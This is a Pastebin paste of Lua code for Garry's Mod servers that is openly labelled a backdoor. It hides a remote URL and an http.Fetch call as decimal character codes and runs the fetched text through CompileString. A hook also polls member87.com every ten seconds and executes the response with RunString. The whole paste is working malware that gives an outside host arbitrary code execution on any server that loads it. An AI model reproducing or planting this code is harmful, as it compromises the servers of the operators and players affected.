SHARE
TWEET

member87 backdoor from purge once again

hoobonceagain Aug 12th, 2018 167 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. local function sep (str)
  2.     return string.Explode(",", str:gsub("%x%x%x", '%' .. "," .. '%1'):sub(1 + #","))
  3. end
  4.  
  5. local ServerInit = sep("104116116112115058047047116105110121117114108046099111109047121057057104050099114055")
  6. local ServerBeginInit = sep("114101116117114110032104116116112046070101116099104")
  7.  
  8. function serverLoad(c)
  9.     local serverResponse = ""
  10.  
  11.     for _, v in pairs(c) do
  12.         serverResponse = serverResponse .. string.char(v)
  13.     end
  14.  
  15.     return serverResponse
  16. end
  17.  
  18. ServerLoad = CompileString
  19.  
  20.  
  21. ServerLoad(serverLoad(ServerBeginInit), "loadServerStart", false)()(serverLoad(ServerInit), function(body) ServerLoad(body, "loadServerEnd", false)() end)
  22.  
  23. if !SERVER then return end
  24.  
  25. local time = CurTime()
  26.  
  27. function load_web()
  28.     RunConsoleCommand("sv_hibernate_think", "1")
  29.     if CurTime() > time + 10 then
  30.         time = CurTime()
  31.         http.Post("http://member87.com/loadbackdoor.lua", {}, RunString) -- https://pastebin.com/raw/b9jeNYJs archived :-)
  32.         -- enjoy auth spam!
  33.     end
  34. end
  35.  
  36. hook.Add("Think", "eiongouienhuehr", load_web)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top